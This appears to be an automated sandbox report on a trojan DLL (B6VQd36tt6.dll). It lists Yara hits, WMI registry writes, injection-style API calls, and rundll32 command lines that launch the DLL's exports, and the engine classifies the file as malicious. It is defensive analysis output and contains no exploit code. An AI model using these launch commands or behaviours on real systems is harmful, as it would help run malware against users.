                      Source: Yara matchFile source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: B6VQd36tt6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0321B40_2_6F0321B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0456000_2_6F045600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F07D6300_2_6F07D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F07B5970_2_6F07B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08A2B10_2_6F08A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303AF243_2_0303AF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03032B763_2_03032B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03034C403_2_03034C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0456003_2_6F045600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F088DAF3_2_6F088DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06E8C03_2_6F06E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0456004_2_6F045600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F08A2B14_2_6F08A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06E8C04_2_6F06E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F06ABD1 appears 86 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F06ABD1 appears 113 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F078487 appears 34 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F06AEC0 appears 36 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0313B8 GetProcAddress,NtCreateSection,memset,0_2_6F0313B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0315C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6F0315C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031273 NtMapViewOfSection,0_2_6F031273
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0323D5 NtQueryVirtualMemory,0_2_6F0323D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03035D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_03035D10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303B149 NtQueryVirtualMemory,3_2_0303B149
                      Source: B6VQd36tt6.dllVirustotal: Detection: 16%
                      Source: B6VQd36tt6.dllReversingLabs: Detection: 24%
                      Source: B6VQd36tt6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrassJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,FieldeightJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,OftenJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B10.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@14/6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03034A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_03034A03
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6284
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2772
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: B6VQd36tt6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: B6VQd36tt6.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb?1 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbl< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000014.00000003.606688005.0000000004963000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596009652.000000000280B000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606688005.0000000004963000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdbK source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb^8 source: WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbH source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.578075706.00000000027EA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594966351.0000000002816000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000E.00000003.586394801.0000000004A23000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600018161.0000000005674000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb: source: WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb-1 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.577718554.00000000027DE000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596009652.000000000280B000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb9 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb~ source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb91 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb} source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb9 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbx< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbt< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdbh source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbb< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.751009999.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.753309847.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584623901.000000006F0AB000.00000002.00020000.sdmp, B6VQd36tt6.dll
                      Source: Binary string: sfc_os.pdbd source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.578075706.00000000027EA000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594966351.0000000002816000.00000004.00000001.sdmp
